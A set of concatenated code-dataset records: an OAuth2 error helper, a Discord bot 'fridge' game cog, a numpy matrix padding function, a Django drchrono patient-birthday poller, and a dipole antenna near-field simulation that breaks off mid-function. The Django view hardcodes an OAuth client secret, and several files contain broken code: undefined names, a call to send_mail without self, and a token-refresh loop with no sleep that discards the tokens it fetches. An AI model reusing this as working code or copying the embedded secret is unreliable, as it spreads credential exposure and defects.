isinstance(exception, InvalidRequest):\n response.status_code = 400\n \n else:\n response.status_code = 401\n \n response['WWW-Authenticate'] = ', '.join(header)\n \n return response\n\ndef json_error_response(exception):\n '''\n Returns an HttpResponse object of JSON error data.\n '''\n if exception is None:\n content = ({\n 'error': 'invalid_request',\n 'error_description': 'Invalid request.'\n })\n \n else:\n content = ({\n 'error': getattr(exception, 'error', 'invalid_request'),\n 'error_description': exception.message\n })\n \n return error_response(\n exception,\n content=simplejson.dumps(content),\n content_type='application/json'\n )\n","sub_path":"oauth2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"588947028","text":"#Standard Imports\nimport logging\nimport random\nfrom typing import Union\n\n#Discord Imports\nimport discord\n\n#Redbot Imports\nfrom redbot.core import commands, checks, Config\n\nfrom typing import cast\nimport json\nfrom pathlib import Path\n\nfrom collections import Counter, defaultdict\n\n\nfrom redbot.core.data_manager import cog_data_path\n\n\nfrom fuzzywuzzy import process\n\n__version__ = \"1.1.0\"\n__author__ = \"oranges\"\n\nlog = logging.getLogger(\"red.oranges_fridge\")\n\nBaseCog = getattr(commands, \"Cog\", object)\n\nclass Fridge(BaseCog):\n \"\"\"\n Add stuff to the fridge\n \"\"\"\n def __init__(self, bot):\n self.bot = bot\n self.config = Config.get_conf(self, identifier=672261474290237490, force_registration=True)\n default_guild = {\n \"fridge\": None,\n \"items\": [\"Banana\", \"Milk\", \"Bread\", \"Butter\", \"Chocolate\", \"Chocolate Milk\", \"Brussel sprouts, yuck!!\", \"A half eaten ham sandwich\"],\n }\n self.config.register_guild(**default_guild)\n self.fridges = defaultdict(Counter)\n\n\n datapath = cog_data_path(self)\n for guild in self.bot.guilds:\n filename = Path(datapath, f\"{guild.id}.json\")\n if filename.exists():\n log.info(f\"Loading backing store {filename}\")\n with open(filename, 'r') as backingstore:\n storeditems = json.load(backingstore)\n fridge = self.fridges[guild]\n for item in storeditems:\n fridge[item] +=1\n\n \n def cog_unload(self):\n datapath = cog_data_path(self)\n for guild in self.fridges.keys():\n fridge = self.fridges[guild]\n storeditems = list()\n for key in fridge.keys():\n count = fridge[key]\n for _ in range(count):\n storeditems.append(key)\n filename = Path(datapath, f\"{guild.id}.json\")\n \n log.info(f\"Writing backing store {filename}\")\n with open(filename, 'w') as backingstore:\n json.dump(storeditems, backingstore)\n\n log.info(\"Unloading\")\n\n @commands.guild_only()\n @commands.group()\n async def fridge(self,ctx):\n \"\"\"\n Fridge commands\n \"\"\"\n pass\n \n @commands.guild_only()\n @checks.mod_or_permissions(administrator=True)\n @fridge.group()\n async def buyables(self,ctx):\n \"\"\"\n Buyable item commands\n \"\"\"\n pass\n\n @fridge.command(aliases=['check'])\n async def current(self, ctx):\n \"\"\"\n Who is currently on the fridge\n \"\"\"\n user = await self.config.guild(ctx.guild).fridge()\n if user:\n await ctx.send(f\"{user} is currently on top of the fridge\")\n else:\n await ctx.send(f\"You look up on the top of the fridge but there is only dust\")\n\n @fridge.command()\n async def put(self, ctx, member: discord.Member):\n \"\"\"\n Put this person on the fridge\n \"\"\"\n user = await self.config.guild(ctx.guild).fridge.set(member.name)\n await ctx.send(f\"{member.mention} has been put on top of the fridge\")\n\n @fridge.command()\n async def add(self, ctx, *, item):\n \"\"\"\n Put something in the fridge\n \"\"\"\n if(\"@\" in item):\n await ctx.send(f\"Nice try\") \n return\n \n if(len(item) > 100):\n await ctx.send(f\"This is too big to fit in the fridge\") \n return\n \n if(item.count('\\n') > 5):\n await ctx.send(f\"This is too spammy to fit in the fridge\")\n return\n\n fridge = self.fridges[ctx.guild]\n fridge[item]+=1\n await ctx.send(f\"You put {item} in the fridge\")\n\n config = self.config.guild(ctx.guild)\n async with config.items() as items:\n if item not in items:\n items.append(item)\n\n @fridge.command(aliases=['take', 'remove', 'find', 'eat'])\n async def get(self, ctx, *, search=None):\n \"\"\"\n Get a random item out of the fridge\n \"\"\"\n fridge = self.fridges[ctx.guild]\n \n if(len(fridge) <= 0):\n await ctx.send(f\"There's nothing in the fridge, you should use restock to refill it!\")\n return\n\n if search:\n item = process.extractOne(search, list(fridge.keys()), score_cutoff=80)\n if not item:\n await ctx.send(f\"You don't seem to have anything you want, maybe get some and add?\")\n return\n item = item[0]\n\n \n else:\n item = random.choice(list(fridge.keys()))\n \n fridge[item] -= 1\n if fridge[item] <= 0:\n del(fridge[item])\n await ctx.send(f\"You take the last {item}, enjoy!\")\n return\n\n await ctx.send(f\"You take out {item}, enjoy!\")\n\n\n @fridge.command()\n async def peek(self, ctx, *, search=None):\n \"\"\"\n Peek into the fridge, specify a search to find certain types of items\n \"\"\"\n fridge = self.fridges[ctx.guild]\n items = fridge.keys()\n if(len(items) <= 0):\n await ctx.send(f\"Bored, you open your fridge only to find there's nothing there!, use restock to refill your fridge\")\n return\n\n spotted = list()\n if search:\n fuzzy_matches = process.extract(search, list(fridge.keys()), limit=30)\n for match in fuzzy_matches:\n if match[1] > 80:\n spotted.append(match[0])\n else:\n sample = min(10, len(items))\n spotted = random.sample(items, sample)\n \n if len(spotted) <= 0:\n await ctx.send(f\"You couldn't really find anything like that\")\n return\n \n output = list()\n\n for item in spotted:\n if fridge[item] > 1:\n output.append(\"{0} {1}\".format(fridge[item], item))\n else:\n output.append(f\"The last {item}\")\n await ctx.send(f\"Bored, you open your fridge and stare into it for a few minutes and you see: {', '.join(output)}\")\n\n @fridge.command()\n async def restock(self, ctx, amount=100):\n \"\"\"\n Refill your fridge with a shopping session\n \"\"\"\n items = list(set(await self.config.guild(ctx.guild).items()))\n fridge = self.fridges[ctx.guild]\n for _ in range(amount):\n fridge[random.choice(items)]+=1\n\n await ctx.send(f\"You had a productive shopping session and the fridge is now teeming with items\")\n\n\n @fridge.command()\n async def tip(self, ctx):\n message = f\"Holy shit {ctx.author.mention} just straight up tipped the fridge over\"\n amount = random.randint(1, 10)\n fridge = self.fridges[ctx.guild]\n items = list(fridge.keys())\n sample = min(amount, len(items))\n spilled_out = random.sample(items, sample)\n if len(spilled_out) >= 1:\n print(spilled_out)\n message += \" items go flying everywhere!\"\n else:\n message += \" but nothing came out, lucky!\"\n for spilled in spilled_out:\n \n lost = random.randint(1, fridge[spilled])\n if lost == 1:\n message += f\" one {spilled} gets scattered across the floor,\"\n else:\n message += f\" {lost} {spilled} get scattered across the floor,\"\n fridge[spilled]-=lost\n if fridge[spilled] <= 0:\n del(fridge[spilled])\n user = await self.config.guild(ctx.guild).fridge()\n if user:\n message += f\" {user} is sent flying from the top of the fridge\"\n await self.config.guild(ctx.guild).fridge.set(None)\n await ctx.send(message)\n\n @buyables.command()\n async def remove(self, ctx, *, item):\n \"\"\"\n Remove an item from the buyable store\n \"\"\"\n items = await self.config.guild(ctx.guild).items()\n if item in items:\n items.remove(item)\n items = await self.config.guild(ctx.guild).items.set(items)\n await ctx.send(f\"{item} has been removed from the Buyables\")\n\n\n @buyables.command()\n @checks.mod_or_permissions(administrator=True)\n async def clear(self, ctx):\n \"\"\"\n Clear all buyable items\n \"\"\"\n self.fridges[ctx.guild] = Counter()\n \n await self.config.guild(ctx.guild).items.set([\"Banana\", \"Milk\", \"Milk\", \"Bread\", \"Butter\", \"Chocolate\", \"Chocolate Milk\", \"Brussel sprouts, yuck!!\", \"A half eaten ham sandwich\"])\n await ctx.send(f\"Buyables has been cleared\")\n\n @buyables.command()\n @checks.mod_or_permissions(administrator=True)\n async def deduplicate(self, ctx):\n \"\"\"\n Remove duplicate buyable items added in earlier versions\n \"\"\"\n items = await self.config.guild(ctx.guild).items()\n setitems = set(items)\n final = list(setitems) \n items = await self.config.guild(ctx.guild).items.set(final)\n await ctx.send(f\"Buyables deduplicated\")\n \n \n @buyables.command()\n @checks.mod_or_permissions(administrator=True)\n async def dump(self, ctx):\n \"\"\"\n Dump all buyables, inadvisable to use in normal circumstances\n \"\"\"\n items = await self.config.guild(ctx.guild).items()\n await ctx.send(\",\".join(items))","sub_path":"fridge/fridge.py","file_name":"fridge.py","file_ext":"py","file_size_in_byte":9384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"528184374","text":"#!/bin/python3\nimport numpy\n\ndef pad(m):\n #add first column to the end and last column to the front\n first_col = numpy.array([m[:,0]]).T\n last_col = numpy.array([m[:,-1]]).T\n temp = numpy.hstack((last_col, m, first_col))\n\n #flip top and bottom rows of original matrix, pad with 0's\n top_row = numpy.insert(m[-1,:], 0, 0)\n top_row = numpy.append(top_row, 0)\n bottom_row = numpy.insert(m[0,:], 0, 0)\n bottom_row = numpy.append(bottom_row,0)\n pad = numpy.vstack((top_row, temp, bottom_row))\n\n return pad\n","sub_path":"hw6/pad.py","file_name":"pad.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"406047225","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport requests\nimport datetime\nimport pytz\nimport time\nfrom threading import Lock\nfrom threading import Thread\n\ndef index(request):\n\tif (hasattr(Polling, 'authorized')):\n\t\treturn HttpResponse(\"Birthday reminder already started - next congrats sending \" + str(Polling.next_sending))\n\tdict = request.GET.dict()\n\tif ('error' in dict):\n\t\traise ValueError('Error authorizing application: ' + dict['error'])\n\tif ('code' in dict):\n\t\tresponse = requests.post('https://drchrono.com/o/token/', data={\n\t\t\t'code': dict['code'],\n\t\t\t'grant_type': 'authorization_code',\n\t\t\t'redirect_uri': 'http://127.0.0.1:8000/polls/',\n\t\t\t'client_id': 'Jtb0qgryKJiXx79yGEAcJsSVUVM4C7dETBvKXHOa',\n\t\t\t'client_secret': 'D4EIENj5b5aSpkRbhoNgXVihtMCqy8QzTFi83yKgLzQlqJSpcb6DZgM8P8MZiK0B74LGAtNSw9sPsAJdTsXm90tkcoGX1paa8bYovnl5axPcppXjSLhUTcwKl8NsN7iJ',\n\t\t})\n\t\tresponse.raise_for_status()\n\t\tdata = response.json()\n\t\twrapper = Polling()\n\t\twrapper.lock = Lock()\n\t\twrapper.access_token = data['access_token']\n\t\twrapper.refresh_token = data['refresh_token']\n\t\twrapper.timeout = data['expires_in']\n\t\tthread = Thread(target = wrapper.poll)\n\t\tthread.start()\n\t\tthread = Thread(target = wrapper.reauth)\n\t\tthread.start()\n\t\tPolling.authorized = True\n\t\treturn HttpResponse(\"Birthday reminder successfully started\")\n\n\treturn HttpResponse(\"Login with drchrono\")\n\nclass Polling:\n\tdef poll(self):\n\t\twhile True:\n\t\t\tself.lock.acquire()\n\t\t\theaders = {\n\t\t\t\t'Authorization': 'Bearer ' + self.access_token,\n\t\t\t}\n\n\t\t\tpatients = []\n\t\t\tpatients_url = 'https://drchrono.com/api/patients'\n\t\t\twhile patients_url:\n\t\t\t\tdata = requests.get(patients_url, headers=headers).json()\n\t\t\t\tpatients.extend(data['results'])\n\t\t\t\tpatients_url = data['next']\n\t\t\tfor patient in patients:\n\t\t\t\tif ('date_of_birth' in patient):\n\t\t\t\t\tbirth = str(patient['date_of_birth'])\n\t\t\t\t\tbirth = birth[5:10]\n\t\t\t\t\tnow = str(datetime.datetime.now(pytz.utc))\n\t\t\t\t\tnow = now[5:10]\n\t\t\t\t\tif birth == now:\n\t\t\t\t\t\tsend_mail(patient)\n\t\t\tself.lock.release()\n\t\t\tPolling.next_sending = datetime.datetime.now(pytz.utc) + datetime.timedelta(seconds=86400)\n\t\t\ttime.sleep(86400)\n\n\n\tdef reauth(self):\n\t\twhile True:\n\t\t\tself.lock.acquire()\n\t\t\tresponse = requests.post('https://drchrono.com/o/token/', data={\n\t\t\t\t'refresh_token': self.refresh_token,\n\t\t\t\t'grant_type': 'refresh_token',\n\t\t\t\t'client_id': 'Jtb0qgryKJiXx79yGEAcJsSVUVM4C7dETBvKXHOa',\n\t\t\t\t'client_secret': 'D4EIENj5b5aSpkRbhoNgXVihtMCqy8QzTFi83yKgLzQlqJSpcb6DZgM8P8MZiK0B74LGAtNSw9sPsAJdTsXm90tkcoGX1paa8bYovnl5axPcppXjSLhUTcwKl8NsN7iJ',\n\t\t\t})\n\t\t\tresponse.raise_for_status()\n\t\t\tdata = response.json()\n\t\t\taccess_token = data['access_token']\n\t\t\trefresh_token = data['refresh_token']\n\t\t\ttimeout = data['expires_in']\n\t\t\tself.lock.release()\n\n\tdef send_mail(self, patient):\n\t\theaders = {\n\t\t\t'Authorization': 'Bearer ' + self.access_token,\n\t\t}\n\t\tresponse = requests.post('https://drchrono.com/api/patients', data={\n\t\t\t'doctor': patient['doctor'],\n\t\t\t'title': 'Happy birthday, dear ' + patient['first_name'],\n\t\t\t'patient': patient['id'],\n\t\t\t'type': 'OD'\n\t\t})\n\t\tassert response.status_code == 201\n","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"296861592","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 19 09:29:37 2019\r\n\r\n@author: henke\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport scipy.integrate as integrate\r\nfrom numpy.linalg import inv\r\nfrom tkinter import *\r\n\r\n# =============================================================================\r\n\r\nwindow = Tk()\r\nwindow.title(\"Near Field Parameters\")\r\nwindow.configure(background = \"#FFFFAA\")\r\n\r\n\r\n\r\n# ========================number of unknowns===================================\r\n \r\n#label_1 = Label(window, text = \"Number of unknowns in the system (31): \", bg = \"#FFFFAA\", font = \"Ariel\")\r\n#nun = StringVar()\r\n#entry_1 = Entry(window, textvariable = nun)\r\n\r\n#label_1.grid(row = 0, sticky = E)\r\n#entry_1.grid(row = 0, column = 1)\r\n\r\ndef execute():\r\n# print(nun.get())\r\n onbekendes = nun.get()\r\n \r\n \r\n return(onbekendes)\r\n\r\n\r\n\r\n# ==========================Feed Voltage=======================================\r\n\r\nlabel_2 = Label(window, text = \"Antenna Feed voltage: \", bg = \"#FFFFAA\", font = \"Ariel\")\r\nfv = StringVar()\r\nentry_2 = Entry(window, textvariable = fv)\r\n\r\nlabel_2.grid(row = 1, sticky = E)\r\nentry_2.grid(row = 1, column = 1)\r\n\r\ndef execute1():\r\n# print(nun.get())\r\n onbekendes = fv.get()\r\n \r\n \r\n return(onbekendes)\r\n\r\n# ===============================Frequency=====================================\r\n\r\nlabel_3 = Label(window, text = \"Frequency in GHz: \", bg = \"#FFFFAA\", font = \"Ariel\")\r\nfreQ = StringVar()\r\nentry_3 = Entry(window, textvariable = freQ)\r\n\r\nlabel_3.grid(row = 2, sticky = E)\r\nentry_3.grid(row = 2, column = 1)\r\n\r\ndef execute2():\r\n# print(nun.get())\r\n onbekendes = freQ.get()\r\n \r\n \r\n return(onbekendes)\r\n\r\n# ==============================Length half dipole=============================\r\n\r\nlabel_4 = Label(window, text = \" Half of dipole length (0.2242 Lamda): \", bg = \"#FFFFAA\", font = \"Ariel\")\r\nlengt = StringVar()\r\nentry_4 = Entry(window, textvariable = lengt)\r\n\r\nlabel_4.grid(row = 3, sticky = E)\r\nentry_4.grid(row = 3, column = 1)\r\n\r\ndef execute3():\r\n# print(nun.get())\r\n onbekendes = lengt.get()\r\n \r\n \r\n return(onbekendes) \r\n\r\n\r\n# =============================Radius of dipole================================\r\n \r\nlabel_5 = Label(window, text = \"Radius of Dipole (0.005 lambda): \", bg = \"#FFFFAA\", font = \"Ariel\")\r\nraD = StringVar()\r\nentry_5 = Entry(window, textvariable = raD)\r\n\r\nlabel_5.grid(row = 4, sticky = E)\r\nentry_5.grid(row = 4, column = 1)\r\nfloat(Zg1)\r\ndef execute4():\r\n# print(nun.get())\r\n onbekendes = raD.get()\r\n \r\n \r\n return(onbekendes)\r\n\r\n\r\n# =============================Wave Impedance==================================\r\n \r\n#label_6 = Label(window, text = \"Wave Impedance in free space(ohms): \", bg = \"#FFFFAA\", font = \"Ariel\")\r\n#wi = StringVar()\r\n#entry_6 = Entry(window, textvariable = wi)\r\n\r\n#label_6.grid(row = 5, sticky = E)\r\n#entry_6.grid(row = 5, column = 1)\r\n\r\n#def execute5():\r\n #print(nun.get())\r\n onbekendes = wi.get()\r\n \r\n \r\n return(onbekendes)\r\n\r\n\r\n# =============================free space permitivity===========================\r\n\r\n#label_7 = Label(window, text = \"Free space permittivity (F/m): \")\r\n#Eps = StringVar()\r\n#entry_7 = Entry(window, textvariable = Eps)\r\n#\r\n#label_7.grid(row = 6, sticky = E)\r\n#entry_7.grid(row = 6, column = 1)\r\n#\r\n#def execute6():\r\n## print(nun.get())\r\n# onbekendes = Eps.get()\r\n# \r\n# \r\n# return(onbekendes)\r\n#\r\n\r\n \r\n# =============================feedpoifloat(Zg1)nt=======================================\r\n \r\n#label_8 = Label(window, text = \"Feed point of the antenna (zg=0 for Center-fed): \", bg = \"#FFFFAA\", font = \"Ariel\")\r\n#zG = StringVar()\r\n#entry_8 = Entry(window, textvariable = zG)\r\n\r\n#label_8.grid(row = 7, sticky = E)\r\n#entry_8.grid(row = 7, column = 1)\r\n\r\ndef execute7():\r\n# print(nun.get())\r\n onbekendes = zG.get()\r\n \r\n \r\n return(onbekendes)\r\n\r\n# =============================================================================\r\n# =============================================================================\r\n\r\nbutton_1 = Button(window, text = \"Run\", command = window.destroy )\r\nbutton_1.grid(row = 8, column = 1)\r\n\r\n \r\n \r\n# =============================================================================\r\nwindow.mainloop()\r\n\r\n#1\r\n#onb = execute()\r\ngnunkns = 31\r\n#rint('Unknowns: ',gnunkns)\r\n\r\n\r\n#2\r\nfv1 = execute1()\r\nFV = float(fv1)\r\nprint('Feed Voltage: ',FV)\r\n\r\n#3\r\nfreq1 = execute2()\r\nFreq = (float(freq1) * (10**9))\r\nprint('Frequency: ',Freq)\r\n\r\n#4\r\nlength1 = execute3()\r\nLen = float(length1)\r\nprint('Length of dipole: ',Len)\r\n\r\n#5\r\nrad1 = execute4()\r\nRad = float(rad1)\r\nprint('Radius of dipole: ',Rad)\r\n\r\n#6\r\n#wi1 = execute5()\r\nWI = 377\r\n#print('Wave Impedance: ',WI)\r\n\r\n##7\r\n#eps1 = execute6()\r\n#EPS = float(eps1)\r\n#print('Free space permittivit: ',EPS)\r\n\r\n#8\r\n#Zg1 = execute7()\r\nZG1 = 0\r\n#print('Feed point of the antenna (zg=0 for Center-fed): ',ZG)\r\n\r\nFreq1 = (float(Freq/10**9))\r\n\r\n\r\n# =============================================================================\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# ==================### RMHVECTOR ###==========================================\r\ndef rmhvector(rx,ry,rz,p):\r\n \r\n rmhx = (rx[p+1]+rx[p])/2\r\n rmhy = (ry[p+1]+ry[p])/2\r\n rmhz = (rz[p+1]+rz[p])/2\r\n \r\n return(rmhx,rmhy,rmhz)\r\n# =============================================================================\r\n# ==================### SUNIT ###==============================================\r\ndef sunit(rx,ry,rz,p):\r\n \r\n rx1 = rx[p+1]\r\n ry1 = ry[p+1]\r\n rz1 = rz[p+1]\r\n rx2 = rx[p]\r\n ry2 = ry[p]\r\n rz2 = rz[p]\r\n rmag = np.sqrt((rx1 - rx2)**2 + (ry1 - ry2)**2 + (rz1 - rz2)**2)\r\n snx = (rx1 - rx2)/rmag\r\n sny = (ry1 - ry2)/rmag\r\n snz = (rz1 - rz2)/rmag\r\n\r\n return(snx, sny, snz, rmag)\r\n \r\n# =============================================================================\r\n# =========================## SCALARFUN ##===================================\r\ndef scalarfun(rx, ry, rz, wk, rad, m, n, del1): #Needs to be finished\r\n \r\n rmx = rx[m]\r\n rmy = ry[m]\r\n rmz = rz[m]\r\n \r\n if (del1 == 0.5):\r\n rnx = rx[n]\r\n rny = ry[n]\r\n rnz = rz[n]\r\n (sx1, sy1, sz1, rmag) = sunit(rx, ry, rz, n)\r\n \r\n elif (del1 == -0.5):\r\n (rnx, rny, rnz) = rmhvector(rx,ry,rz,n-1)\r\n (sx1, sy1, sz1, rmag) = sunit(rx, ry, rz, n-1)\r\n \r\n delta2 = rmag/2.0\r\n \r\n if (m==n):\r\n def F(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return(np.exp(-1j*wk*np.sqrt((rmx-rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))/np.sqrt((rmx - rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))\r\n psi = integrate.quad(F, 0, delta2,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n \r\n# F = np.exp(-1j*wk*np.sqrt((rmx-rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))/np.sqrt((rmx - rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2)\r\n\r\n elif (m!=n):\r\n def F(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return(np.exp(-1j*wk*np.sqrt((rmx-rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))/np.sqrt((rmx - rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))\r\n psi = integrate.quad(F, 0, delta2,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n\r\n return(psi[0])\r\n \r\n \r\n# =============================================================================\r\n# \r\n# =======================## SCALARPOT ##=======================================\r\ndef scalarpot(rx, ry, rz, wk, rad, m, del1, n, q):\r\n \r\n rnx = rx[n]\r\n rny = ry[n]\r\n rnz = rz[n]\r\n \r\n rnx2 = rx[q]\r\n rny2 = ry[q]\r\n rnz2 = rz[q]\r\n \r\n (sx1, sy1, sz1, rmag) = sunit(rx, ry, rz, n)\r\n if (del1 == 0.5):\r\n (rmx, rmy, rmz) = rmhvector(rx, ry, rz, m)\r\n \r\n elif (del1 == -0.5):\r\n (rmx, rmy, rmz) = rmhvector(rx, ry, rz, m-1)\r\n \r\n delta = rmag\r\n# delta2=delta/2\r\n \r\n \r\n dist1 = np.sqrt((rmx - rnx)**2 + (rmy - rny)**2 + (rmz - rnz)**2)\r\n dist2 = np.sqrt((rmx - rnx2)**2 + (rmy - rny2)**2 + (rmz - rnz2)**2)\r\n \r\n if ((dist1 < delta) & (dist2 < delta)): #possible problem with comparisons\r\n# def F(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n# return(np.exp(-1j*wk*np.sqrt((rmx-rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))/np.sqrt((rmx - rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))\r\n# \r\n# psi = integrate.quad(F, 0, delta,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n def Fi(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return (np.imag(np.exp(-1j*wk*np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2))/np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2)))\r\n def Fr(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return (np.real(np.exp(-1j*wk*np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2))/np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2)))\r\n \r\n psir = integrate.quad(Fr, 0.0, delta,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n psii = integrate.quad(Fi, 0.0, delta,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n psi=psir[0]+1j*psii[0]\r\n \r\n else:\r\n# def F(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n# return(np.exp(-1j*wk*np.sqrt((rmx-rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))/np.sqrt((rmx - rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))\r\n# \r\n# psi = integrate.quad(F, 0, delta,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n def Fi(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return (np.imag(np.exp(-1j*wk*np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2))/np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2)))\r\n def Fr(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return (np.real(np.exp(-1j*wk*np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2))/np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2)))\r\n \r\n psir = integrate.quad(Fr, 0.0, delta,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n psii = integrate.quad(Fi, 0.0, delta,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n psi=psir[0]+1j*psii[0]\r\n\r\n return(psi)\r\n \r\n# =============================================================================\r\n# ==========================## VECPOT ##=======================================\r\n\r\ndef vecpot(rx, ry, rz, wk, rad, m, n, del1):\r\n \r\n rmx = rx[m]\r\n rmy = ry[m]\r\n rmz = rz[m]\r\n \r\n if (del1 == 0.5): \r\n rnx = rx[n]\r\n rny = ry[n]\r\n rnz = rz[n]\r\n (sx1, sy1, sz1, rmag) = sunit(rx, ry, rz, n)\r\n \r\n elif (del1 == -0.5):\r\n (rnx, rny, rnz) = rmhvector(rx,ry,rz,n-1)\r\n (sx1, sy1, sz1, rmag) = sunit(rx, ry, rz, n-1)\r\n \r\n delta2 = rmag/2.0\r\n \r\n if (m==n):\r\n def Fi(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return (np.imag(np.exp(-1j*wk*np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2))/np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2)))\r\n def Fr(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return (np.real(np.exp(-1j*wk*np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2))/np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2)))\r\n \r\n psir = integrate.quad(Fr, 0.0, delta2,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n psii = integrate.quad(Fi, 0.0, delta2,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n psi=psir[0]+1j*psii[0]\r\n \r\n elif (m!=n):\r\n def Fi(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return(np.imag(np.exp(-1j*wk*np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2))/np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2)))\r\n def Fr(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return(np.real(np.exp(-1j*wk*np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2))/np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2)))\r\n psir = integrate.quad(Fr, 0.0, delta2,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n psii = integrate.quad(Fi, 0.0, delta2,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n psi=psir[0]+1j*psii[0]\r\n \r\n return(psi)\r\n\r\n# =========================### EFIELD ###======================================\r\ndef efieldnear(rx, ry, rz, xdd, ydd, zdd, solvector, wk, rad, factor, delta, wavelength, ix, iy, iz, nunkns):\r\n# rx = np.arange(nunkns2,dtype=np.float)\r\n \r\n nunkns2 = nunkns+2 \r\n mp1 = nunkns2 +1\r\n rxx= np.arange(mp1+3,dtype=np.float)\r\n ryy= np.arange(mp1+3,dtype=np.float)\r\n rzz= np.arange(mp1+3,dtype=np.float)\r\n for o in range (0,33):\r\n rxx[o]=rx[o]\r\n ryy[o]=ry[o]\r\n rzz[o]=rz[o]\r\n if (ix == 1):\r\n \r\n rxx[mp1] = xdd - 0.0005*wavelength\r\n ryy[mp1] = ydd\r\n rzz[mp1] = zdd\r\n \r\n rxx[mp1+1] = xdd \r\n 